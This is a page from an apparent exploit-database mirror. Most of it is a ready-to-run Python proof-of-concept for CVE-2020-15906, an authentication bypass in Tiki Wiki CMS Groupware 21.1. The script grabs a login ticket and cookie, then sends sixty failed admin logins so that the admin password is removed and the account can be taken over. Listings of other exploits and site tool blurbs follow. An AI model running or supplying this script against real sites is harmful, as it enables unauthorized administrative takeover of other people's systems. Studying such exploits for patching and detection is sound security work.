To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass"

Author

Exploit author

"Maximilian Barz"

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-21

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
# Date: 01.08.2020 (1st August 2020)
# Exploit Author: Maximilian Barz aka. Silky
# Vendor Homepage: tiki.org
# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
# Version: 21.1
# Tested on: Kali Linux 5.7.0-kali1-amd64

#!/usr/bin/env/python3
import requests
import json
import lxml.html
import sys

banner = ''' 

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ€  β–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ€    β–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ€  β–ˆβ–ˆβ€β–ˆβ–ˆβ€    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€  β–ˆβ–ˆβ€   β–ˆβ–ˆβ€                                                                                                   
β€β€β€β–ˆβ–ˆβ€β€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€ β–ˆβ–ˆβ€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€    β–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ€ β–ˆβ–ˆβ€β€β–ˆβ–ˆβ€    β€β€β€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ€  β–ˆβ–ˆβ–ˆβ€                                                                                                   
   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β€ β–ˆβ–ˆβ€β–ˆβ–ˆβ€ β–ˆβ€ β–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β€ β–ˆβ–ˆβ€     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€  β€β–ˆβ–ˆβ€                                                                                                   
   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β–ˆβ–ˆβ€ β–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β–ˆβ–ˆβ€ β–ˆβ–ˆβ€    β–ˆβ–ˆβ€β€β€β€β€  β–ˆβ–ˆβ€   β–ˆβ–ˆβ€                                                                                                   
   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ€  β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€  β–ˆβ–ˆβ€β–ˆβ–ˆβ€    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ β–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ€                                                                                                   
                                                                                                                                                                        
                                                                                                                                                                        
 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ€  β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ€ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ€ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ β–ˆβ–ˆβ–ˆβ€   β–ˆβ–ˆβ€        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€
β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β€β€β€β–ˆβ–ˆβ€β€β€β€β–ˆβ–ˆβ€  β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β€β€β€β€β–ˆβ–ˆβ–ˆβ–ˆβ€  β–ˆβ–ˆβ€β€β€β€β–ˆβ–ˆβ€β€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β€β€β€β€β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€β€β€β€β–ˆβ–ˆβ€β€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ€  β–ˆβ–ˆβ€        β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€β€β–ˆβ–ˆβ€ β–ˆβ–ˆβ€β€β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β€β€β€β€β–ˆβ–ˆβ€β€β€β€β€β€
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€  β–ˆβ–ˆβ€β–ˆβ–ˆβ€ β–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ€     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ€β–ˆβ–ˆβ€ β–ˆβ–ˆβ€        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β€ β€β–ˆβ–ˆβ–ˆβ–ˆβ€β€ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€
β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β€β€  β–ˆβ–ˆβ€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ€     β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β–ˆβ–ˆβ€β€β–ˆβ–ˆβ€β–ˆβ–ˆβ€        β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€  β€β–ˆβ–ˆβ€β€  β–ˆβ–ˆβ€β€β€β€β€ β–ˆβ–ˆβ€β€β€β–ˆβ–ˆβ€β€β€β€β€β€β–ˆβ–ˆβ€β€β€β€β€β€β–ˆβ–ˆβ€
β–ˆβ–ˆβ€  β–ˆβ–ˆβ€β€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€  β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ€ β€β–ˆβ–ˆβ–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ€  β–ˆβ–ˆβ€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€β€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β€β–ˆβ–ˆβ€ β€β–ˆβ–ˆβ–ˆβ–ˆβ€       β€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β€   β–ˆβ–ˆβ€   β–ˆβ–ˆβ€     β–ˆβ–ˆβ€  β–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ€
                                                                                                                                                                        
Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
'''




def main():
    if(len(sys.argv) < 2):
        print(banner)
        print("Usage: %s <host> " % sys.argv[0])
        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
        return


    rhost = sys.argv[1]
    url = "http://"+rhost+"/tiki/tiki-login.php"

    session = requests.Session()

    def get_ticket():
        r = requests.get(url)
        login_page = r.text.encode('utf-8') 
        html = lxml.html.fromstring(login_page) 
        auth = html.xpath('//input[@name="ticket"]/@value')

        return str(auth)[2:-2]

    def get_cookie():
        session.get(url)
        return session.cookies.get_dict()


    cookie = get_cookie()
    ticket = get_ticket()
    
    payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'}
    headers = {
        'Host': rhost,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzrhost, deflate',
        'Referer': 'http://'+rhost+'/tiki/tiki-login.php',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '125',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0',
    }


    for i in range(60):
        r = session.post(url, payload, headers)
        if("Account requires administrator approval." in r.text):
            print("Admin Password got removed.")
            print("Use BurpSuite to login into admin without a password ")



if(__name__ == '__main__'):
    main()
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-10-21 "Tiki Wiki CMS Groupware 21.1 - Authentication Bypass" webapps php "Maximilian Barz"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48927/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.